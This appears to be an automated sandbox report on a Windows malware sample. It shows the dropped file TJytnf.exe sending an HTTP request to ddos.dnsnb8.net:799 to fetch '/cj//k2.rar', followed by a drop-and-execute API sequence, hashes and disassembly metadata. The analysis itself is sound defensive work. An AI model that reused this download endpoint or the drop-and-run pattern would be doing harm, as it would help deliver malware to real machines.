Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	44.221.84.105	799	3044	C:\Users\user\AppData\Local\Temp\TJytnf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 22:28:29.441939116 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	1
Start time:	16:28:19
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\biKy3nZEyJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\biKy3nZEyJ.exe"
Imagebase:	0x400000
File size:	3'101'704 bytes
MD5 hash:	6963BB0311DED02BA57657BA4A61D427
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:28:19
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\TJytnf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
Imagebase:	0xf70000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:28:31
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1568
Imagebase:	0xe80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	87.5%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 00740044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00740223
WriteFile.KERNELBASE(00000000,FFEC74CC,00003E00,?,00000000), ref: 00740252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00740256
WinExec.KERNEL32(?,00000005), ref: 00740262

Strings

lstr, xrefs: 007401A7
Crea, xrefs: 00740169
odul, xrefs: 0074022D
catA, xrefs: 007401AF
Writ, xrefs: 00740148
Kern, xrefs: 007400F4
.dll, xrefs: 00740102
Clos, xrefs: 00740129
TJytnf.exe, xrefs: 007401FD, 00740200
el32, xrefs: 007400FB
athA, xrefs: 00740199
dleA, xrefs: 007400D0
WinE, xrefs: 00740110
GetT, xrefs: 00740188
GetM, xrefs: 007400B6

Memory Dump Source

Source File: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$TJytnf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-2051679233
Opcode ID: e199eddd33a27495d627918e3a499fccf7fe6845e9a388fd4e39f2dae1141158
Instruction ID: 586f86233e2cf17913a23bd254e9a1c0644a6c8c069bb837390bc4b2348fd581
Opcode Fuzzy Hash: e199eddd33a27495d627918e3a499fccf7fe6845e9a388fd4e39f2dae1141158
Instruction Fuzzy Hash: E7611775D0121ADBCF24CF94C884ABDFBB4BF48315F2586AAD605AB641C3789E81CBD1

Non-executed Functions

Function 00451E50 Relevance: 1.6, Strings: 1, Instructions: 356COMMON

Download Yara Rule

Strings

&$D, xrefs: 00451E55

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: &$D
API String ID: 0-1138263919
Opcode ID: 16946f61db68bcfa531c36d6d805463b69b88be8b43f4469fbf2aaa6f77174ea
Instruction ID: e966281431bde8f5ced9cdf8469f613dde040be4f3ae541fddc8c2c659d61bd9
Opcode Fuzzy Hash: 16946f61db68bcfa531c36d6d805463b69b88be8b43f4469fbf2aaa6f77174ea
Instruction Fuzzy Hash: ECC11476A107454BE744CF39CC806AAB7D2EFC4305F148A3AE911C3396EB78D649C7A9

Function 0044DAC0 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

@, xrefs: 0044DB84

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5d0147e1b8e4f5d6d3a745a26ed7d802266730a9675a78caf94c80bb1a58acd4
Instruction ID: 80d21c34bb6ae7158faf62bcd033f9d34088e83b4646355621e00821d873ed2c
Opcode Fuzzy Hash: 5d0147e1b8e4f5d6d3a745a26ed7d802266730a9675a78caf94c80bb1a58acd4
Instruction Fuzzy Hash: 2C315972A007094BE724DE299C4956BB3E4DFC0305F044A3FF952C3342EA38EA49C7A9

Function 00442970 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

NETHASP_00112233445566zz, xrefs: 00442A77

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID: NETHASP_00112233445566zz
API String ID: 0-526728173
Opcode ID: d600ed2a37e33558740473f6b209a886bd2979a05da70e6f98333cf0bf7521f6
Instruction ID: c01a8595a570e52076e6c81c97361f43471d4346ebe204a663ac6df0e50c8e0d
Opcode Fuzzy Hash: d600ed2a37e33558740473f6b209a886bd2979a05da70e6f98333cf0bf7521f6
Instruction Fuzzy Hash: 2731F70E9593C24DE325DB7888107FBAFE29FE6210F5D49BE98D98B783C4294046D3B1

Function 00452810 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd94b818cdc8712dc955d815b6b14d439c12b0c554483b827a4191f1f18468a8
Instruction ID: 5621dbd42eb087a3efff43b148d242805c835e3021cf1da33a348ce65f153428
Opcode Fuzzy Hash: bd94b818cdc8712dc955d815b6b14d439c12b0c554483b827a4191f1f18468a8
Instruction Fuzzy Hash: 8E020B7690878A8FD714DF1CC84162AB7E1BFC8304F4A096CEA909B356DB78F915CB85

Function 004522C0 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d31817f79e43d1fcc6de6552c2b922a3367e755c2ee81730d96a6ef8bda629
Instruction ID: 53ccb12187c115fc644893fb2bd5b782b7f6e5df37e2e0993c5105b0d6249dbf
Opcode Fuzzy Hash: 89d31817f79e43d1fcc6de6552c2b922a3367e755c2ee81730d96a6ef8bda629
Instruction Fuzzy Hash: 19020B7690878A8FD714DF1CC84162AB7E1BFC8304F4A096CEA909B356DB78F915CB85

Function 0040431D Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0581a7e887880e07d6ed4b153e311fd59c7b35d25d5a62e0b506935308d7da
Instruction ID: 6d36cd6d847ac50dff605874ce029c1b3f790dd0e664c9ca5f43211dfae37df0
Opcode Fuzzy Hash: fa0581a7e887880e07d6ed4b153e311fd59c7b35d25d5a62e0b506935308d7da
Instruction Fuzzy Hash: 2971579698E3C05FD71347B058696917FB0AE23124B5F92DBC8C6CF8A3E54D484AC323

Function 00441360 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfb336ec09bbebb29675f50539243b0cc2fdd3e4537de5a9ff245748efdf1395
Instruction ID: 9aa426ad075d82161b80894cc8baeffa32b3dde6747d47502b9ba796aab667d1
Opcode Fuzzy Hash: dfb336ec09bbebb29675f50539243b0cc2fdd3e4537de5a9ff245748efdf1395
Instruction Fuzzy Hash: 4F51F3756092814BE720DE39D841AEBBBD6DFD9314F09897AE9C8C3302D029D85D87A6

Function 004492E0 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ce41991173dbadcfdea74fd3bd294495b0c6485591fe382654d4bfbba070e6
Instruction ID: 21d6890e665c97951741c4f196da70ae8bd21b77b76669c31e00aa3f47cb015d
Opcode Fuzzy Hash: 85ce41991173dbadcfdea74fd3bd294495b0c6485591fe382654d4bfbba070e6
Instruction Fuzzy Hash: 07619E719083019FD714DF24D881B6BBBE0FB89319F44482EF88997352D339EA49CB96

Function 0044DC20 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a682b18139214241742368ae0951ac6ff74cfb4a1e3dddf2ab81183e74a6f54c
Instruction ID: e760f3c057393c1c42fa8d829563a35c3de7d9169446fb1d9e2c12d635d1a7f5
Opcode Fuzzy Hash: a682b18139214241742368ae0951ac6ff74cfb4a1e3dddf2ab81183e74a6f54c
Instruction Fuzzy Hash: 7C417BB2A01B454BF318CB2CCC8976BB792DBC4305F148B2ED512D7786DA78A505C3A8

Function 00442030 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23e764a258e746145005bb8f228fc192aa5f362aa6b61e6851fcbfe09853e0d
Instruction ID: 53e8721af9d2935ff255f281c9490100fd106ccb408c2b8e94a8cc1d056f0990
Opcode Fuzzy Hash: f23e764a258e746145005bb8f228fc192aa5f362aa6b61e6851fcbfe09853e0d
Instruction Fuzzy Hash: 7AF0F69BA0161F5FC310EE68B8801E3B3DBE7B67A0B1A1461E740C7321E1A11809E254

Function 004035A2 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d74de621471113eeeb8add9240d3a41931af28086330595ed0f5070e02ead39
Instruction ID: 3fed552dc0f16c94019d21b909574d6693bb4f651eae2b4a6156c6236d19073f
